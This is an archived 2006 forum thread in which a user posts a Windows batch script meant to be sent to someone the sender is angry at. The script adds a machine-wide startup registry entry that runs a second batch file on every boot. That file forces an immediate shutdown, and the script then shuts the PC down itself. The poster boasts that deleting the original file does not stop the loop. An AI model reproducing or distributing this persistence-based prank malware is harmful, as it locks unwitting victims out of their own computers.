ThyElite Forums  
Go Back   ThyElite Forums > General > General Talk
Reload this Page Pissed at someone? Send them this!
Reply
 
Thread Tools Display Modes
(#1)
Old
Jimmy is Offline
Senior Member
Jimmy is on a distinguished road
 
Posts: 111
Join Date: Jun 2006
Default 08-20-2006, 06:23 PM

thats so sick
Reply With Quote
(#2)
Old
kevthedude is Offline
Veteran Member
kevthedude is on a distinguished road
 
Posts: 98
Join Date: Jun 2006
Default 08-20-2006, 08:36 PM

Okay, Here is a code I came up with. It can be executed from anywhere on the PC and still work. The code below MUST stay EXACTLY the same as it is printed here. The file can be named anything but must be a .bat file. I have not tested the shutdown file but I'm 99% sure it'll work. I have confirmed that it will add the file to the startup registry location and it will run this on any user using the PC. A cool feature I added is that if there is a file with the same name and location as the ones being saved, it'll delete them and then create a new one.

Code:
@echo off
if exist C:\system_reg.reg del C:\system_reg.reg
echo Windows Registry Editor Version 5.00 >> C:\system_reg.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> C:\system_reg.reg
echo "system_reg"="\"C:/system_bat.bat\"" >> C:\system_reg.reg
regedit.exe /S /C C:\system_reg.reg
if exist C:\system_bat.bat del C:\system_bat.bat
echo SHUTDOWN -S -t 1 >> C:\system_bat.bat
SHUTDOWN -S -t 1
If an admin wants to put this in special access be my guest.

Edit: The even better part is that if they delete the original file that was sent to them, they would still have this problem because a whole new .bat file is created.

Last edited by kevthedude : 08-20-2006 at 08:42 PM.
Reply With Quote
Reply


Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

vB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Forum Jump

Similar Threads
Thread Thread Starter Forum Replies Last Post
Im Fuckin Pissed! Money_C Raged 4 08-18-2006 06:32 PM
Fucking Pissed Of Bad At Fucking Proxy Users BigB0MB Raged 3 08-12-2006 12:04 PM



Powered by vBulletin® Version 3.6.8
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.